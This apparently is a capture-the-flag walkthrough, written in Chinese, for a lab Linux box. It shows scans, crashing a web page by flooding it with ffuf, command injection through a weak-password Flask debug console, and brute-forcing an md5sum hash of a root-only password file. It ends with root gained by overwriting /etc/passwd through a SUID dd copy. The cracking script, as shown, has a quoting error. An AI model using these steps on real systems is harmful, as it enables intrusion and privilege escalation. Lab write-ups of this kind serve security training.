Box Info #
| OS | Difficulty |
|---|---|
| Linux | Easy |
Nmap #
[root@kali] /home/kali/Umz
❯ nmap 192.168.55.73 -sV -A -p-
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-title: cyber fortress 9000
|_http-server-header: Apache/2.4.62 (Debian)
Dirsearch #
[root@kali] /home/kali/Umz
❯ dirsearch -u http://192.168.55.73
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, asp, aspx, jsp, html, htm | HTTP method: GET | Threads: 25 | Wordlist size: 12289
Target: http://192.168.55.73/
[02:39:29] Scanning:
[02:39:30] 403 - 278B - /.php
[02:39:38] 200 - 3KB - /index.html
[02:39:38] 200 - 3KB - /index.php
[02:39:38] 200 - 3KB - /index.php/login/
[02:39:43] 403 - 278B - /server-status/
[02:39:43] 403 - 278B - /server-status
Task Completed
Request Flood #
来到index.php,可以看到过多请求会触发某种机制
[root@kali] /home/kali/Umz
❯ curl http://192.168.55.73/index.php
<skip>
<body>
<div class="container">
<div class="alert">
⚠ DDoS Protection Active: This service is protected by automated anti-DDoS measures.
Excessive requests will trigger security protocols.
</div>
<h1 class="status-header">Resource Stress Test Interface</h1>
<div class="load-indicator">
<h2>Service Status Monitor</h2>
<p>🟢 System Operational - Health Check Identifier: <strong>HEALTHY_STRING</strong></p>
</div>
<div class="calculation-summary">
<h3>Prime Number Generation</h3>
<p>Successfully generated prime numbers up to
<span class="prime-count">10000</span>
</p>
<p>Total primes calculated: <strong>1229</strong></p>
</div>
<div class="system-notice">
<h3>Security Notice</h3>
<p>This diagnostic interface is protected by multiple security layers:</p>
<ul>
<li>Automated traffic analysis</li>
<li>Request rate limiting</li>
<li>Connection fingerprinting</li>
</ul>
</div>
</div>
</body>
</html>
这里可以使用一个简单粗暴的方式,就是同时开启多个FFUF
Nmap2 #
然后index.php会崩溃,再次扫描端口,多了一个8080端口
[root@kali] /home/kali/Umz
❯ nmap 192.168.55.73 -sV -A -p-
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
8080/tcp open http Werkzeug httpd 1.0.1 (Python 3.9.2)
| http-title: Debug Console Login
|_Requested resource was http://192.168.55.73:8080/login
使用弱密码admin/admin登录后,可以绕过ping进行命令执行
Own umzyyds #
查看sudo
welcome@Umz:~$ sudo -l
Matching Defaults entries for welcome on Umz:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User welcome may run the following commands on Umz:
(ALL) NOPASSWD: /usr/bin/md5sum
查看到/opt目录下有一个密码文件
welcome@Umz:/opt$ ls -al
total 12
drwxr-xr-x 3 root root 4096 May 3 09:46 .
drwxr-xr-x 18 root root 4096 Mar 18 20:37 ..
drwxr-xr-x 2 welcome welcome 4096 May 3 10:32 flask-debug
welcome@Umz:/opt$ cd flask-debug/
welcome@Umz:/opt/flask-debug$ ls -al
total 20
drwxr-xr-x 2 welcome welcome 4096 May 3 10:32 .
drwxr-xr-x 3 root root 4096 May 3 09:46 ..
-rw-r--r-- 1 root root 5001 May 3 10:23 flask_debug.py
-rwx------ 1 root root 10 May 3 10:32 umz.pass
由于无法读取,尝试直接转成MD5然后再去爆破
这里写一个脚本
[root@kali] /home/kali/Umz
❯ cat poc.sh ⏎
while IFS= read -r line; do
head -n 1 <<< "$line"' | md5sum | grep -q "a963fadd7fd379f9bc294ad0ba44f659" && echo "Found: $line" && break
done < rockyou.txt
[root@kali] /home/kali/Umz
❯ bash poc.sh
Found: sunshine3
得到密码是sunshine3
Root #
找到一个有SUID的文件
umzyyds@Umz:~$ ls -al
total 96
drwx------ 2 umzyyds umzyyds 4096 May 3 10:42 .
drwxr-xr-x 4 root root 4096 May 3 10:27 ..
lrwxrwxrwx 1 root root 9 May 3 10:38 .bash_history -> /dev/null
-rw-r--r-- 1 umzyyds umzyyds 220 May 3 10:27 .bash_logout
-rw-r--r-- 1 umzyyds umzyyds 3526 May 3 10:27 .bashrc
-rwsr-sr-x 1 root root 76712 May 3 10:42 Dashazi
-rw-r--r-- 1 umzyyds umzyyds 807 May 3 10:27 .profile
命令提示和dd相似
umzyyds@Umz:~$ ./Dashazi --help
Usage: ./Dashazi [OPERAND]...
or: ./Dashazi OPTION
Copy a file, converting and formatting according to the operands.
bs=BYTES read and write up to BYTES bytes at a time (default: 512);
overrides ibs and obs
cbs=BYTES convert BYTES bytes at a time
conv=CONVS convert the file as per the comma separated symbol list
count=N copy only N input blocks
ibs=BYTES read up to BYTES bytes at a time (default: 512)
if=FILE read from FILE instead of stdin
iflag=FLAGS read as per the comma separated symbol list
obs=BYTES write BYTES bytes at a time (default: 512)
of=FILE write to FILE instead of stdout
oflag=FLAGS write as per the comma separated symbol list
seek=N skip N obs-sized blocks at start of output
skip=N skip N ibs-sized blocks at start of input
status=LEVEL The LEVEL of information to print to stderr;
'none' suppresses everything but error messages,
'noxfer' suppresses the final transfer statistics,
'progress' shows periodic transfer statistics
N and BYTES may be followed by the following multiplicative suffixes:
c =1, w =2, b =512, kB =1000, K =1024, MB =1000*1000, M =1024*1024, xM =M,
GB =1000*1000*1000, G =1024*1024*1024, and so on for T, P, E, Z, Y.
Each CONV symbol may be:
ascii from EBCDIC to ASCII
ebcdic from ASCII to EBCDIC
ibm from ASCII to alternate EBCDIC
block pad newline-terminated records with spaces to cbs-size
unblock replace trailing spaces in cbs-size records with newline
lcase change upper case to lower case
ucase change lower case to upper case
sparse try to seek rather than write the output for NUL input blocks
swab swap every pair of input bytes
sync pad every input block with NULs to ibs-size; when used
with block or unblock, pad with spaces rather than NULs
excl fail if the output file already exists
nocreat do not create the output file
notrunc do not truncate the output file
noerror continue after read errors
fdatasync physically write output file data before finishing
fsync likewise, but also write metadata
Each FLAG symbol may be:
append append mode (makes sense only for output; conv=notrunc suggested)
direct use direct I/O for data
directory fail unless a directory
dsync use synchronized I/O for data
sync likewise, but also for metadata
fullblock accumulate full blocks of input (iflag only)
nonblock use non-blocking I/O
noatime do not update access time
nocache Request to drop cache. See also oflag=sync
noctty do not assign controlling terminal from file
nofollow do not follow symlinks
count_bytes treat 'count=N' as a byte count (iflag only)
skip_bytes treat 'skip=N' as a byte count (iflag only)
seek_bytes treat 'seek=N' as a byte count (oflag only)
Sending a USR1 signal to a running 'dd' process makes it
print I/O statistics to standard error and then resume copying.
Options are:
--help display this help and exit
--version output version information and exit
可以比较一下,没有区别
umzyyds@Umz:~$ diff /usr/bin/dd ./Dashazi
进行文件写入,修改/etc/passwd中的UID位为Root
umzyyds@Umz:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
welcome:x:1000:1000:,,,:/home/welcome:/bin/bash
umzyyds:x:1001:1001:,,,:/home/umzyyds:/bin/bash
umzyyds@Umz:~$ vim passwd
umzyyds@Umz:~$ cat passwd | ./Dashazi of=/etc/passwd
2+1 records in
2+1 records out
1436 bytes (1.4 kB, 1.4 KiB) copied, 0.00068782 s, 2.1 MB/s
umzyyds@Umz:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
welcome:x:1000:1000:,,,:/home/welcome:/bin/bash
umzyyds:x:0:0:,,,:/home/umzyyds:/bin/bash
然后重新登录即可
umzyyds@Umz:~$ su - umzyyds
Password:
root@Umz:~# id
uid=0(root) gid=0(root) groups=0(root)
Summary #
User: 通过大量请求导致index.php崩溃,进入到8080端口命令执行
Root: md5sum读取密码,最后修改/etc/passwd提权